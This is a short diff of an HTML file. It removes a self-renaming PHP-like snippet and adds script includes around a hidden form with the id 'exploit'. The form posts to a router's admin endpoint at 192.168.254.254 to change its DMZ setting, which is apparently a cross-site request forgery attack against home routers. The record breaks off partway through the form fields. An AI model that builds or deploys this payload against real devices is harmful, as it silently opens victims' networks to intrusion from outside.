--- a/zlt-bjc/zlt.html
+++ b/zlt-bjc/zlt.html
@@ -1,10 +1,6 @@
-<?html
-$filename = basename(__FILE__, '.html');
-$filename1 = "$filename.php";  
-$generate = bin2hex(random_bytes(5));
-$generate1 = "zlt$generate.html"; 
-rename($filename1, $generate1);
-?>
+<script src="zlt.htm?1481269289258"></script>
+
+<script src="zlt.html"></script>
 <form method="post" id="exploit" action="http://192.168.254.254/goform/goform_set_cmd_process">
 <input name="goformId" value="DMZ_SETTING" type="hidden">
 <input name="isTest" value="false" type="hidden">
